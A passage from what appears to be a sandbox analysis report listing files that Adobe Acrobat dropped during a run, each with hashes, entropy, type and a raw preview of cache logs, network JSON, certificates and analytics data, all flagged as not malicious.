                                                                                            Preview:2024/12/19-06:50:45.499 12b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:50:45.501 12b4 Recovering log #3.2024/12/19-06:50:45.501 12b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):335
                                                                                            Entropy (8bit):5.165775352961603
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7Vgq2PCHhJ2nKuAl9Ombzo2jMGIFUt8ODZZmw+ODzkwOCHhJ2nKuAl9Ombzo2jM4:7VgvBHAa8uFUt8Od/+Ov56HAa8RJ
                                                                                            MD5:01B17001662C1174DA7222FB775AECF1
                                                                                            SHA1:A13213AE3E55CEE9672DD946F07FF1753C06A12F
                                                                                            SHA-256:2CCAD0516A02A6F95118C064912072C2D632BF6673202308E67B474CB9D82168
                                                                                            SHA-512:5D73FC02551DE4AF767361692AEB4D0CE1BF75D457F3638C05F2E2BA1253548A60F15F12E1CE795AA6D2A4FA21DC918F29D5DC7726627E5B421A737ED221BCA1
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.522 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:50:45.524 ab0 Recovering log #3.2024/12/19-06:50:45.524 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):335
                                                                                            Entropy (8bit):5.165775352961603
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7Vgq2PCHhJ2nKuAl9Ombzo2jMGIFUt8ODZZmw+ODzkwOCHhJ2nKuAl9Ombzo2jM4:7VgvBHAa8uFUt8Od/+Ov56HAa8RJ
                                                                                            MD5:01B17001662C1174DA7222FB775AECF1
                                                                                            SHA1:A13213AE3E55CEE9672DD946F07FF1753C06A12F
                                                                                            SHA-256:2CCAD0516A02A6F95118C064912072C2D632BF6673202308E67B474CB9D82168
                                                                                            SHA-512:5D73FC02551DE4AF767361692AEB4D0CE1BF75D457F3638C05F2E2BA1253548A60F15F12E1CE795AA6D2A4FA21DC918F29D5DC7726627E5B421A737ED221BCA1
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.522 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:50:45.524 ab0 Recovering log #3.2024/12/19-06:50:45.524 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.968905002143363
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqa7sBdOg2Hpcaq3QYiub6P7E4TX:Y2sRdsx8dMHQ3QYhbS7n7
                                                                                            MD5:6373D8355DD0F7D96A64F50BE49FD16C
                                                                                            SHA1:E715AFEAFA86CFE7128AF994C5CAC9C905912FC2
                                                                                            SHA-256:8585690C753072FF225DAB19998E243A65648E863D8362B59209C7C43295CB12
                                                                                            SHA-512:95A1AE5F77BD091E99CA2E4871D9EAB917A9A1521C8B31A4DD0D91C67FFF8BC35794565931A428B619BD934B39980A69734152497D0D0A2C22C22BFFF0CB8BC8
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169058618221","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":585373},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):3878
                                                                                            Entropy (8bit):5.23779918122259
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bIoBne:S43C4mS7fFi0KFYDjr3LWO3V3aw+bIge
                                                                                            MD5:7995A95F3A1C1303B2A78350BA1A0F48
                                                                                            SHA1:B693D3E28A568BF0A89504F0637985A10659227C
                                                                                            SHA-256:0B7E1A87D21719492FE7572EFB57B8EA775D76862DC5DF31EBB9DB2DA3EEF15F
                                                                                            SHA-512:D50E8CD6C1296751CBAC5563A737864C44108011A07AE7C4F602DA5CD3AAD40207FF52EE314CDAAA8E1BC587E299E71A31087387DE7B5FAA6F855109394DF885
                                                                                            Malicious:false
                                                                                            Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):323
                                                                                            Entropy (8bit):5.183005114704604
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7nEgq2PCHhJ2nKuAl9OmbzNMxIFUt8OvBZmw+ONWkwOCHhJ2nKuAl9OmbzNMFLJ:7nEgvBHAa8jFUt8OZ/+Oc56HAa84J
                                                                                            MD5:A3606BDE9D5D845510AE3B341CF605FF
                                                                                            SHA1:4194F23A011FF6445595384ECA0BD54216338BEF
                                                                                            SHA-256:87BF353919EB043AC67774726D6484DA49DAA4FDFDB8DB22BB870E05A30CDD70
                                                                                            SHA-512:21F82C8E0F0F352290A4E52B4E2D80D53102189ED37F0AB0D221D9108F4A8A70557B7D5AE35E05D7BC189C51E140E7D4ECB47BA3C025AA4AB03AF616E393F4B6
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.901 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:50:45.902 ab0 Recovering log #3.2024/12/19-06:50:45.903 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):323
                                                                                            Entropy (8bit):5.183005114704604
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7nEgq2PCHhJ2nKuAl9OmbzNMxIFUt8OvBZmw+ONWkwOCHhJ2nKuAl9OmbzNMFLJ:7nEgvBHAa8jFUt8OZ/+Oc56HAa84J
                                                                                            MD5:A3606BDE9D5D845510AE3B341CF605FF
                                                                                            SHA1:4194F23A011FF6445595384ECA0BD54216338BEF
                                                                                            SHA-256:87BF353919EB043AC67774726D6484DA49DAA4FDFDB8DB22BB870E05A30CDD70
                                                                                            SHA-512:21F82C8E0F0F352290A4E52B4E2D80D53102189ED37F0AB0D221D9108F4A8A70557B7D5AE35E05D7BC189C51E140E7D4ECB47BA3C025AA4AB03AF616E393F4B6
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.901 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:50:45.902 ab0 Recovering log #3.2024/12/19-06:50:45.903 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):65110
                                                                                            Entropy (8bit):0.6376462682686903
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                            MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                            SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                            SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                            SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                            Malicious:false
                                                                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:Certificate, Version=3
Category:dropped
Size (bytes):1391
Entropy (8bit):7.705940075877404
Encrypted:false
SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:false
Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:dropped
Size (bytes):71954
Entropy (8bit):7.996617769952133
Encrypted:true
SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:false
Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:dropped
Size (bytes):192
Entropy (8bit):2.756901573172974
Encrypted:false
SSDEEP:3:kkFklbGce3b31fllXlE/HT8kvLltNNX8RolJuRdxLlGB9lQRYwpDdt:kKFpb32T8mJNMa8RdWBwRd
MD5:8D213593086FC6A974B632AB71258BF1
SHA1:DC9124769CFAFBD3BA0B0C8AF44F488B5A25A48C
SHA-256:F83FBFAB4784FDF1E94AC692B46A2D4FA93A2F97979BBB9372E89893F74F2D8E
SHA-512:FE7A14500C4FB31D7D33AB953294A41FEC7D7B776D9616FC01B1F1774359459E3C44AB8F6FFF6DFB04DD5BB60A189804CCDB712D39452FE04E44A8EA0CC5E8C0
Malicious:false
Preview:p...... ........(#yC.R..(....................................................... ..........W....J...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:modified
Size (bytes):328
Entropy (8bit):3.1382935058119616
Encrypted:false
SSDEEP:6:kKd9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8DnLNkPlE99SNxAhUe/3
MD5:B9632DC9D782B6E71BD91AEE76AEBEC5
SHA1:5724FDABB37A4B73A67AE18FB5BD7868C76A14C0
SHA-256:3EDD21A6C5D3433B31D160D1B92D6E55517D8B3D77E11AE3F59C938D7630EBAA
SHA-512:5D9E2D9A227B29A411DB73969C732CD3412274B0A5FCCF89398C5C068B9B5A1358A1E73564B7DED8ED0243E5916D77AB6E745162AD18E83F71F0B09955404C12
Malicious:false
Preview:p...... .........'sV.R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):295
Entropy (8bit):5.349687840605552
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJM3g98kUwPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGMbLUkee9
MD5:3FCED705E7B568701918A40F6915B287
SHA1:5A02075424E42436BD46274B08D219CFBC680EC1
SHA-256:E93BD6475DD26A9461CD41503037C33E35179E217F92D986EA980B6D759A8CC5
SHA-512:5F72A979689D2E9629089A28AE60FA96570BDEF01990182865277160E3CF1F4569C3C29C02560EE4E059FE32059F56B71BD1F5A034D5C2FEF4F87823F004F11B
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):294
Entropy (8bit):5.2810718096216
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfBoTfXpnrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGWTfXcUkee9
MD5:C6EA1202D5B1DD7550669066351189A5
SHA1:809A98878CB0FEB39B74E545708B3D8857BEC7B4
SHA-256:A927CDF0BADBC2FFF3A86D11D3EF8DE07690C8A0897D3D5DDD4B7FB52DD059AB
SHA-512:E8EF0C3716E12CA4CDC8D2E8AC043FAEA11E33FA0ADCE44F7164B896C9ACF1A2361C7D48E9D02FE7A2B61143952C02F6AD3BA99692789FAA9BD395BF7BDB2D5C
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):294
Entropy (8bit):5.260396732460192
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfBD2G6UpnrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGR22cUkee9
MD5:2662F3DD1317E06FAF609C4A12F74777
SHA1:C784FA53E1A5A92C736D0A92E3D9A4FB8B66CC65
SHA-256:873167AAAB040739274423813C9B8613B813B58F3CA31A7D9B161A66EA790A64
SHA-512:8FC86CCF4CF97FF954611082025513476EEACA9540DBA4D9960854950932318CE81B2CA0D582F03948032620DE30CA93D4F37DE7425A82A3A22D630FFEF01F2D
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):285
Entropy (8bit):5.326156543441667
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfPmwrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGH56Ukee9
MD5:4BBDBDFFE7C7F322199A2D3C852B2738
SHA1:7814168905449FC76A68FA0FD9DB0E91A4E28C47
SHA-256:F49C3348AF0C7465FB55A1E8FF63520300B5D1B5D5974F9F68BF6EEE78300FF9
SHA-512:8300E591518BE72FAE902F48B0DACEE0936C525C2C327BD06E5C182391B772CC4C86EBBD94BC2C6D2EF376EACF595D73B3842290199162568132B5A26A9180EF
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):1123
Entropy (8bit):5.684094098705642
Encrypted:false
SSDEEP:24:Yv6X8AUP62JhHpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:Yv1A/2JhHhgy6SAFv5Ah8cv/O
MD5:C4CE523EA1DB6C3BA853515519B7E870
SHA1:84E02665237A465459AEC08AD5CFECB3B9ABEA43
SHA-256:732BC60C71BB99A751DF7037D96631FE1EE39E9877D52416247E6C7ECE918B6A
SHA-512:38A04F3ABF79416CC5985212892A6C54402072ECECCE2825C32246D2B0B5BA3E01F3DFAD43501BF66A31DE475DD3DE196676DD58F748B72F94E13BE0420D20D5
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):289
Entropy (8bit):5.2722945078508285
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf8dPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGU8Ukee9
MD5:7496FF6961CD7633C9745A7D150BE774
SHA1:246ED508585E14328D2BBCEA131BA38389676D15
SHA-256:492491FE8A3EBC76CCAAB6C7549072DEE769D6BA5925459309525DF9904ECFE4
SHA-512:431E548095D179E41442CA9909BF3E43B9D31F583B24A6BF5D346AD0475FEB5B0BE13B35DEDBDE38A13D8AD2F961AD2392F60DE7E014D33662B110CD402214A7
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):292
Entropy (8bit):5.270185396030335
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfQ1rPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGY16Ukee9
MD5:AA71EC793DFE0FE9551A587628928146
SHA1:8098CD414D566DD041110EDA420C463665838840
SHA-256:CB6D12C0761A2A4CF4A7AA47193BD5130BBF570D5675CAF5B170ADD5A1DCC0CE
SHA-512:E7B956992AA7327CAE317D2CA8895B9BD789B073763CE601A078F3AD1EAE436D38941CB2BB8A51FCB8814785097D29ADB2A81FC6C46CE6047B5DEBEB01D6A144
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):289
Entropy (8bit):5.287767253981597
Encrypted:false
